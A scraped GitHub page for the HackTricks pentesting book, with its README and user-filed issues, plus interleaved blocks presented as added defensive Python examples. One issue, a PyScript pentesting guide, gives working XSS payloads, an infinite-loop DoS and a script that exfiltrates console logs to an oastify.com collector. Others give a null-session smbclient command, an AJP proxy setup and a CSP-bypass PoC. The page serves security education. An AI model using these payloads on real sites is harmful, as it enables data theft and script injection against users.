Hacktricks - Welcome to the page where you will find each trick/technique/whatever I have learnt in CTFs, real life apps, and reading researches and news.


HackTricks

Welcome to the page where you will find each hacking trick/technique/whatever I have learnt in CTFs, real life apps, and reading researches and news.

Here you can find a little introduction:

Pentesting Methodology

Here you will find the typical flow that you should follow when pentesting one or more machines.

Click in the title to start!

{% hint style="danger" %} Do you use Hacktricks every day? Did you find the book very useful? Would you like to receive extra help with cybersecurity questions? Would you like to find more and higher quality content on Hacktricks?
Support Hacktricks through github sponsors so we can dedicate more time to it and also get access to the Hacktricks private group where you will get the help you need and much more! {% endhint %}

If you want to know about my latest modifications/additions or you have any suggestion for HackTricks or PEASS, join the 💬 telegram group, or follow me on Twitter 🐦 @carlospolopm.
If you want to share some tricks with the community you can also submit pull requests to https://github.com/carlospolop/hacktricks that will be reflected in this book, and don't forget to give it a star on GitHub to motivate me to continue developing this book.

Corporate Sponsors

STM Cyber

STM Cyber is a great cybersecurity company whose slogan is HACK THE UNHACKABLE. They perform their own research and develop their own hacking tools to offer several valuable cybersecurity services like pentesting, red teaming and training.

You can check their blog at https://blog.stmcyber.com

STM Cyber also supports cybersecurity open source projects like HackTricks :)

INE

INE is a great platform to start learning or improve your IT knowledge through their huge range of courses. I personally like and have completed many from the cybersecurity section. INE also provides the official preparation courses for the eLearnSecurity certifications.

INE also supports cybersecurity open source projects like HackTricks :)

Courses and Certifications reviews

You can find my reviews of the certifications eMAPT and eWPTXv2 (and their respective preparation courses) in the following page:

{% content-ref url="courses-and-certifications-reviews/ine-courses-and-elearnsecurity-certifications-reviews.md" %} ine-courses-and-elearnsecurity-certifications-reviews.md {% endcontent-ref %}

License

Copyright © Carlos Polop 2021. Except where otherwise specified (the external information copied into the book belongs to the original authors), the text on HACK TRICKS by Carlos Polop is licensed under the Attribution-NonCommercial 4.0 International (CC BY-NC 4.0).
If you want to use it for commercial purposes, contact me.

Comments
  • TypeError: can only concatenate str (not "bytes") to str

    Hello, I have really enjoyed your Hack Trick series, but after trying your ROP-PWN template, I have encountered the following issue noted below. I would love to continue learning with the exercise. Please let me know if any additional details are needed.

    I appreciate your help with this.

    https://raw.githubusercontent.com/carlospolop/hacktricks/master/misc/basic-python/rop-pwn-template.md

    $ python3 --version
    Python 3.8.5

    [*] Loaded 14 cached gadgets for './vuln'
    [*] running in new terminal: /usr/bin/gdb -q "/home/palmistry/CTF/vuln" 2973 -x /tmp/pwnrsj3k9sx.gdb
    [-] Waiting for debugger: debugger exited! (maybe check /proc/sys/kernel/yama/ptrace_scope)
    [*] Main start: 0x401156
    [*] Puts plt: 0x401054
    [*] pop rdi; ret gadget: 0x4011f3
    [*] puts GOT @ 0x404018
    Traceback (most recent call last):
      File "template.py", line 90, in <module>
        get_addr("puts") #Search for puts address in memmory to obtains libc base
      File "template.py", line 72, in get_addr
        rop1 = OFFSET + p64(POP_RDI) + p64(FUNC_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT)
    TypeError: can only concatenate str (not "bytes") to str

    opened by wafflesx90 7
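The traceback above is the classic Python 2 to 3 migration problem: `p64()` returns `bytes`, so `OFFSET` must be `bytes` too (`b"A" * n`, not `"A" * n`). The following is an added example, not code from the HackTricks template or from the reporter; it uses a `struct`-based `p64` (assumed equivalent to pwntools' `p64` for little-endian 64-bit values) so it runs without pwntools, reuses the addresses printed in the log above, and shows both the failing concatenation and a helper that rejects a `str` padding with a clearer message.

```python
import struct


def p64(value: int) -> bytes:
    """Pack a 64-bit little-endian word; assumed equivalent to pwntools' p64()."""
    return struct.pack("<Q", value)


def reproduce_error():
    """Return the message Python 3 raises when str padding meets bytes from p64()."""
    try:
        "A" * 40 + p64(0x4011F3)  # str + bytes: the exact line 72 situation
    except TypeError as exc:
        return str(exc)
    return None


def build_chain(padding: bytes, *words: int) -> bytes:
    """Concatenate padding and packed words, failing early if padding is a str.

    All pieces of a chain must be bytes in Python 3; the isinstance check turns a
    confusing mid-chain TypeError into a message that names the actual mistake.
    """
    if not isinstance(padding, (bytes, bytearray)):
        raise TypeError(
            "padding must be bytes, e.g. b'A' * 40, not %s" % type(padding).__name__
        )
    return bytes(padding) + b"".join(p64(w) for w in words)


if __name__ == "__main__":
    print(reproduce_error())
    # Addresses taken from the log in the issue above (pop rdi; ret gadget, puts GOT, puts PLT, main).
    chain = build_chain(b"A" * 40, 0x4011F3, 0x404018, 0x401054, 0x401156)
    print(len(chain), chain[40:48].hex())
```

The fix in a template of this shape is a one-character change: declare the padding as `b"A" * OFFSET_LEN` (or `b"".ljust(...)`) rather than a text string, and keep every later piece (`p64(...)`, `b"\n"`, and so on) as `bytes`.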
  • Method to read the material offline (ebook or PDF)

    I really enjoy this site and the information you've created. I tried a number of ways to scrape the site to a PDF or ebook for offline consumption, but none of them worked or they looked really bad. :)

    enhancement help wanted 
    opened by gkwhite 6
  • PyScript Pentesting Guide

    PyScript is a new framework for integrating Python into HTML so that it can be used alongside HTML. In this cheat sheet you'll find how to use PyScript for your penetration testing purposes.

    Dumping / Retrieving files from the Emscripten virtual memory filesystem:

    Code:

    <py-script>
        with open('/lib/python3.10/site-packages/_pyodide/_base.py', 'r') as fin:
            out = fin.read()
            print(out)
    </py-script>

    Result: (screenshot)

    OOB Data Exfiltration of the Emscripten virtual memory filesystem (console monitoring)

    Code:

    <py-script>
    x = "CyberGuy"
    if x == "CyberGuy":
        with open('/lib/python3.10/asyncio/tasks.py') as output:
            contents = output.read()
            print(contents)
    print('<script>console.pylog = console.log.bind(console); console.logs = []; console.log = function(){     console.logs.push(Array.from(arguments));     console.pylog.apply(console, arguments);fetch("http://9hrr8wowgvdxvlel2gtmqbspigo8cx.oastify.com/", {method: "POST",headers: {"Content-Type": "text/plain;charset=utf-8"},body: JSON.stringify({"content": btoa(console.logs)})});}</script>')
    </py-script>

    Result: (screenshot)

    Cross Site Scripting (Ordinary)

    Code:

    <py-script>
    print("<img src=x onerror='alert(document.domain)'>")
    </py-script>

    Result: (screenshot)

    Cross Site Scripting (Python Obfuscated)

    Code:

    <py-script>
    sur = "\u0027al";fur = "e";rt = "rt"
    p = "\x22x$$\x22\x29\u0027\x3E"
    s = "\x28";pic = "\x3Cim";pa = "g";so = "sr"
    e = "c\u003d";q = "x"
    y = "o";m = "ner";z = "ror\u003d"

    print(pic+pa+" "+so+e+q+" "+y+m+z+sur+fur+rt+s+p)
    </py-script>

    Result: (screenshot)

    Cross Site Scripting (JavaScript Obfuscation)

    Code:

    <py-script>
    print("<script>var _0x3675bf=_0x5cf5;function _0x5cf5(_0xced4e9,_0x1ae724){var _0x599cad=_0x599c();return _0x5cf5=function(_0x5cf5d2,_0x6f919d){_0x5cf5d2=_0x5cf5d2-0x94;var _0x14caa7=_0x599cad[_0x5cf5d2];return _0x14caa7;},_0x5cf5(_0xced4e9,_0x1ae724);}(function(_0x5ad362,_0x98a567){var _0x459bc5=_0x5cf5,_0x454121=_0x5ad362();while(!![]){try{var _0x168170=-parseInt(_0x459bc5(0x9e))/0x1*(parseInt(_0x459bc5(0x95))/0x2)+parseInt(_0x459bc5(0x97))/0x3*(-parseInt(_0x459bc5(0x9c))/0x4)+-parseInt(_0x459bc5(0x99))/0x5+-parseInt(_0x459bc5(0x9f))/0x6*(parseInt(_0x459bc5(0x9d))/0x7)+-parseInt(_0x459bc5(0x9b))/0x8*(-parseInt(_0x459bc5(0x9a))/0x9)+-parseInt(_0x459bc5(0x94))/0xa+parseInt(_0x459bc5(0x98))/0xb*(parseInt(_0x459bc5(0x96))/0xc);if(_0x168170===_0x98a567)break;else _0x454121['push'](_0x454121['shift']());}catch(_0x5baa73){_0x454121['push'](_0x454121['shift']());}}}(_0x599c,0x28895),prompt(document[_0x3675bf(0xa0)]));function _0x599c(){var _0x34a15f=['15170376Sgmhnu','589203pPKatg','11BaafMZ','445905MAsUXq','432bhVZQo','14792bfmdlY','4FKyEje','92890jvCozd','36031bizdfX','114QrRNWp','domain','3249220MUVofX','18cpppdr'];_0x599c=function(){return _0x34a15f;};return _0x599c();}</script>")
    </py-script>

    Result: (screenshot)

    DoS attack (Infinity loop)

    Code:

    <py-script>
    while True:
        print("&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;")
    </py-script>

    Result: (screenshot)

    opened by Cyber-Guy1 4
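Every finding in the guide above rests on one property: whatever a `<py-script>` block passes to `print()` is inserted into the page as HTML, so string-built markup (the obfuscated `<img ...>` variant) and unbounded output (the infinite loop) both land in the DOM. The block below is an added example, not part of the guide or of PyScript itself: it reassembles the fragment-built payload from the "Python Obfuscated" section (constructed here from the same fragments so the check runs offline), shows that a cheap tag detector catches it while `html.escape` neutralises it, and adds a small output budget of the kind that would stop the `while True` case. `looks_like_markup`, `safe_output` and `OutputBudget` are names chosen for this example.

```python
import html
import re

# Constructed: the fragments from the "Python Obfuscated" block above, in print() order.
FRAGMENTS = [
    "\x3Cim", "g", " ", "sr", "c\u003d", "x", " ", "o", "ner", "ror\u003d",
    "\u0027al", "e", "rt", "\x28", "\x22x$$\x22\x29\u0027\x3E",
]

# Anything a browser would start parsing as a tag: "<", optional "/", then a letter.
TAG_RE = re.compile(r"<\s*/?\s*[a-zA-Z]")


def assemble(fragments):
    """Join string fragments the way the obfuscated block does (escape sequences resolve at parse time)."""
    return "".join(fragments)


def looks_like_markup(text: str) -> bool:
    """Detection: does the text contain something a browser would parse as an HTML tag?"""
    return bool(TAG_RE.search(text))


def safe_output(text: str) -> str:
    """Escape text before it reaches print() inside <py-script>, so it renders as text, not markup."""
    return html.escape(text, quote=True)


class OutputBudget:
    """Cap the number of writes a block may make; a runaway loop trips the cap instead of the page."""

    def __init__(self, max_writes: int = 1000):
        self.max_writes = max_writes
        self.writes = 0

    def emit(self, text: str) -> str:
        if self.writes >= self.max_writes:
            raise RuntimeError("output budget of %d writes exceeded" % self.max_writes)
        self.writes += 1
        return safe_output(text)


if __name__ == "__main__":
    payload = assemble(FRAGMENTS)
    print(payload, looks_like_markup(payload))
    print(safe_output(payload), looks_like_markup(safe_output(payload)))
```

Escaping at the output boundary is the same control as for any server-side template engine; PyScript does not apply it for you, which is why `print()` of file contents or of user-controlled strings behaves like an unescaped template variable.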
  • Adding 1 more method for auto revshell

    The github repo https://github.com/lukechilds/reverse-shell makes reverse shells very simple and automatic! Visit https://reverse-shell.sh/ to know more 😉

    opened by clem9669 4
  • Wrong sudo version number

    Hi,

    Doing some research on Linux LPE, I noticed that the Linux Privilege Escalation page mentions sudo <= v1.28 being vulnerable. However, as per the article here https://www.exploit-db.com/exploits/47502, the version is instead 1.8.28. They say that it's been fixed in 1.8.28 but I've read in another article (can't find the link anymore) that it is still valid in 1.8.28. Most probably a typo.

    Thank you.

    opened by dlionis 3
  • fix typo+consistent description in automatic tools

    Fixed a syntax error in the nmap command of the automatic tools section: removed nse and added -- instead of - for better compatibility. More consistent description.

    opened by DeveloperOl 3
  • 139,445 - Pentesting SMB

    Hey there,

    I just ran into something that would be probably nice to have as information to pentest SMB shares:

    I'm actually getting restricted from displaying available network shares on a Windows machine, which first made me believe there aren't any open shares. After researching though (reading the section about SMB of the Network Security Assessment, 3rd Edition book) I found the names of common shares and tested them manually, which actually led to successfully connecting to an exposed share.

    So my enhancement would be to add a section at "139,445 - Pentesting SMB" that encourages manually testing for common open shares regardless of whether they are displayed or not.

    Common share names for windows described in the book are

    IPC$ C$ D$ ADMIN$ PRINT$ FAX$ SYSVOL NETLOGON

    I used the following command to manually test the shares

    smbclient -U '%' -N \\\\IP\\SHARE

    Please let me know what you think and thank you for such an awesome resource.

    opened by 0xalwayslucky 3
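The suggestion above amounts to a fixed check: try each well-known share name with a null session even when share listing is refused, and record which ones answer. The block below is an added example, not from the issue or from HackTricks, written so an administrator can run it against their own hosts; it wraps the `smbclient -U '%' -N` invocation from the comment (using the `//host/share` spelling smbclient also accepts) and takes the runner as a parameter so the logic can be exercised without a live SMB server. `audit_null_session_shares` and `exposed_shares` are names chosen here.

```python
import shutil
import subprocess
from typing import Callable, Dict, Iterable, List

# The share names quoted in the issue above (Network Security Assessment, 3rd ed.).
COMMON_SHARES: List[str] = ["IPC$", "C$", "D$", "ADMIN$", "PRINT$", "FAX$", "SYSVOL", "NETLOGON"]


def smbclient_runner(host: str, share: str, timeout: int = 10) -> int:
    """Connect with a null session and list the share; return smbclient's exit status (0 = success).

    Equivalent to the command in the issue: smbclient -U '%' -N //host/share -c ls
    """
    if shutil.which("smbclient") is None:
        raise RuntimeError("smbclient is not installed")
    proc = subprocess.run(
        ["smbclient", "-U", "%", "-N", "//%s/%s" % (host, share), "-c", "ls"],
        capture_output=True,
        timeout=timeout,
    )
    return proc.returncode


def audit_null_session_shares(
    host: str,
    shares: Iterable[str] = COMMON_SHARES,
    runner: Callable[[str, str], int] = smbclient_runner,
) -> Dict[str, bool]:
    """Map each candidate share name to whether an anonymous connection succeeded.

    A failed connection, a missing smbclient binary or a timeout all count as "not exposed"
    so one bad host does not abort the whole audit.
    """
    results: Dict[str, bool] = {}
    for share in shares:
        try:
            results[share] = runner(host, share) == 0
        except (RuntimeError, subprocess.TimeoutExpired, OSError):
            results[share] = False
    return results


def exposed_shares(results: Dict[str, bool]) -> List[str]:
    """Just the share names that accepted the null session, sorted for stable reporting."""
    return sorted(name for name, ok in results.items() if ok)


if __name__ == "__main__":
    import sys

    target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"  # placeholder host
    print(exposed_shares(audit_null_session_shares(target)))
```

On the defensive side, `IPC$` answering a null session is normal on many Windows versions, but any data share (`C$`, `ADMIN$`, `SYSVOL` outside a domain controller) reachable anonymously is a finding worth following up regardless of whether the host lets you enumerate shares.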
  • Link for Docker container escape points to a non-existing page

    This one needs to be updated I think.

    Docker socket /var/run/docker.sock is writable (https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket)

    With maybe this one https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout/abusing-docker-socket-for-privilege-escalation. Maybe it was moved.

    opened by 0xsyr0 2
  • URL-encode base64 encoded hash

    Base64 strings can contain "+", "=" and "/" characters.

    Also use PHP for hash generation (like the showcased symfony code).

    opened by juergenhoetzel 2
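The point raised above is easy to get wrong: standard base64 uses `+`, `/` and `=`, which have their own meaning inside a URL (`+` becomes a space in a query string, `/` is a path separator, `=` splits key from value), so a base64 hash must be URL-encoded or emitted in the URL-safe alphabet before being placed in a link. The following is an added example, not code from the issue or from the book; it uses a constructed 4-byte digest whose base64 form contains every problematic character, and `decode_token` accepts both spellings. In PHP the corresponding call is `urlencode(base64_encode(...))`.

```python
import base64
import hashlib
import urllib.parse


def b64_token(digest: bytes) -> str:
    """Standard base64 (RFC 4648 section 4): may contain '+', '/' and trailing '='."""
    return base64.b64encode(digest).decode("ascii")


def needs_url_encoding(token: str) -> bool:
    """True when a standard-base64 token cannot be placed in a URL as-is."""
    return any(ch in token for ch in "+/=")


def as_query_param(name: str, token: str) -> str:
    """Percent-encode the token as a query parameter; '+' becomes %2B, '/' %2F, '=' %3D."""
    return urllib.parse.urlencode({name: token})


def urlsafe_token(digest: bytes) -> str:
    """URL-safe base64 (RFC 4648 section 5): '-' and '_' instead of '+' and '/', padding dropped."""
    return base64.urlsafe_b64encode(digest).decode("ascii").rstrip("=")


def decode_token(token: str) -> bytes:
    """Accept a percent-encoded standard token or an unpadded URL-safe token and recover the digest."""
    text = urllib.parse.unquote(token)
    text = text.replace("-", "+").replace("_", "/")
    text += "=" * (-len(text) % 4)  # restore padding that urlsafe_token stripped
    return base64.b64decode(text, validate=True)


def hash_token(data: bytes) -> str:
    """The real-world case: a SHA-256 digest encoded for use in a URL."""
    return as_query_param("h", b64_token(hashlib.sha256(data).digest()))


if __name__ == "__main__":
    # Constructed digest chosen so its base64 form is "+/+/AA==", hitting every special character.
    digest = b"\xfb\xff\xbf\x00"
    print(b64_token(digest), as_query_param("h", b64_token(digest)), urlsafe_token(digest))
    print(hash_token(b"example"))
```

Whichever form is chosen, the receiving side must apply the matching decode; mixing a URL-safe encoder with a standard decoder (or forgetting the padding) silently produces a different byte string and a hash comparison that never matches.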
  • MQTT duplicate

    I saw my change made in https://github.com/carlospolop/hacktricks/pull/318 was not reflected to https://book.hacktricks.xyz/network-services-pentesting/1883-pentesting-mqtt-mosquitto.

    That's because I PRed to pentesting/1883-8883-pentesting-mqtt-mosquitto.md which is not displayed on the website. Only the duplicated page network-services-pentesting/1883-pentesting-mqtt-mosquitto.md.

    Gitbook seems to generate a lot of mess and duplicate files 😂

    I suggest:

    • Removing network-services-pentesting/1883-pentesting-mqtt-mosquitto.md
    • Moving pentesting/1883-8883-pentesting-mqtt-mosquitto.md to network-services-pentesting/1883-8883-pentesting-mqtt-mosquitto.md
    opened by noraj 2
  • Bad Link on Book

    Under section "To-Do" sub section "Other Big References".

    The link for "Enumeration Cheat Sheet for Windows Targets", is sending users to a link unintended for the purposes of the book.

    opened by Wubzi 0
  • Modules suggestion

    Best Practice details how to use Criminalip. https://www.criminalip.io/developer/best-practice

    It is also provided by Filter, tags, API, etc. https://www.criminalip.io/developer/filters-and-tags/filters https://www.criminalip.io/developer/filters-and-tags/tags https://www.criminalip.io/developer/api/post-user-me

    If you use Asset Search in CriminalIP, you can obtain various information by referring to filter URLs such as IP or tag, and if you use Domain Search, you can determine the presence or absence of malicious/phishing sites.

    I answered what page I should put in the previously requested content, but Criminalip supports OSINT such as malicious IP, phishing site, and Domain search.

    It is a wide range of CTI platforms such as shodan and censys, so please check it.

    opened by parkjunmin 0
  • Necessary Package no Longer Available on Kali

    https://book.hacktricks.xyz/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp

    The package "libapache2-mod-jk" is no longer available in Kali Linux. It's necessary for the "AJP Proxy" section. My workaround was downloading it from a Debian repo here: https://packages.debian.org/buster/libapache2-mod-jk

    sudo apt-get install libapache2-mod-jk
    sudo vim /etc/apache2/apache2.conf # append the following line to the config
        Include ajp.conf
    sudo vim /etc/apache2/ajp.conf     # create the following file, change HOST to the target address 
        ProxyRequests Off
        <Proxy *>
            Order deny,allow
            Deny from all
            Allow from localhost
        </Proxy>
        ProxyPass       / ajp://HOST:8009/
        ProxyPassReverse    / ajp://HOST:8009/
    sudo a2enmod proxy_http
    sudo a2enmod proxy_ajp
    sudo systemctl restart apache2
    

    According to this page the package was removed from Kali Rolling and Dev in August 2022 https://pkg.kali.org/pkg/libapache-mod-jk

    Full disclosure I am kind of a noob, so I'm not sure if this is the optimal workaround, but it did get everything working for me.

    opened by Plus1059 0
  • CSP Bypass: "Lack of object-src and default-src" not working

    Relating this part of HackTricks.

    The bypass shown here doesn't work on either the latest Chrome or Firefox. Is there any source where this came from?

    PoC:

    <!DOCTYPE html>
    <html lang="en">
    <head>
        <meta charset="UTF-8">
        <title>Title</title>
        <meta http-equiv="Content-Security-Policy" content="script-src 'self' ;">
    </head>
    <body>
    <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
    ">'><object type="application/x-shockwave-flash" data='https://ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/charts/assets/charts.swf?allowedDomain=\"})))}catch(e) {alert(1337)}//'>
        <param name="AllowScriptAccess" value="always"></object>
    </body>
    </html>
    

    This results in Content Security Policy: The page’s settings blocked the loading of a resource at inline (“script-src”).

    opened by PinkDraconian 1
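Whether or not the particular `<object>` payloads above still fire in current browsers, the policy in the PoC (`script-src 'self' ;`) does leave `object-src` unrestricted, because `object-src` falls back to `default-src` and neither is set. The block below is an added example, not from the issue or from HackTricks: a small CSP parser plus a check that reports the effective `object-src` and recommends `object-src 'none'` when nothing constrains it. `parse_csp`, `effective_sources` and `audit_object_src` are names chosen for this example; the fallback rule is the one defined by the CSP specification.

```python
from typing import Dict, List, Optional, Tuple

Policy = Dict[str, List[str]]


def parse_csp(header: str) -> Policy:
    """Split a Content-Security-Policy value into {directive: [source expressions]}.

    Directives are ';'-separated, tokens whitespace-separated; names are case-insensitive.
    Trailing ';' and empty directives (as in the PoC) are ignored.
    """
    policy: Policy = {}
    for directive in header.split(";"):
        tokens = directive.split()
        if tokens:
            policy.setdefault(tokens[0].lower(), tokens[1:])  # first occurrence wins per spec
    return policy


def effective_sources(policy: Policy, directive: str) -> Tuple[Optional[List[str]], Optional[str]]:
    """Resolve a fetch directive through its default-src fallback.

    Returns (sources, where they came from); (None, None) means nothing restricts it.
    """
    if directive in policy:
        return policy[directive], directive
    if "default-src" in policy:
        return policy["default-src"], "default-src"
    return None, None


def audit_object_src(header: str) -> str:
    """One-line verdict on plugin/<object> loading for a given CSP header value."""
    sources, via = effective_sources(parse_csp(header), "object-src")
    if sources is None:
        return ("object-src is unrestricted: neither object-src nor default-src is set; "
                "add object-src 'none'")
    if sources == ["'none'"]:
        return "ok: object-src is 'none' (via %s)" % via
    return "object-src allows %s (via %s); consider object-src 'none'" % (" ".join(sources), via)


if __name__ == "__main__":
    # The policy from the PoC above, and a hardened variant for comparison.
    for csp in ("script-src 'self' ;", "default-src 'self'; object-src 'none'"):
        print(repr(csp), "->", audit_object_src(csp))
```

The same `effective_sources` helper answers the equivalent question for `base-uri`, `frame-src` or `worker-src`, since every fetch directive shares the `default-src` fallback.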
Owner
Carlos Polop
Developer, Pentester and Cyber Security Researcher.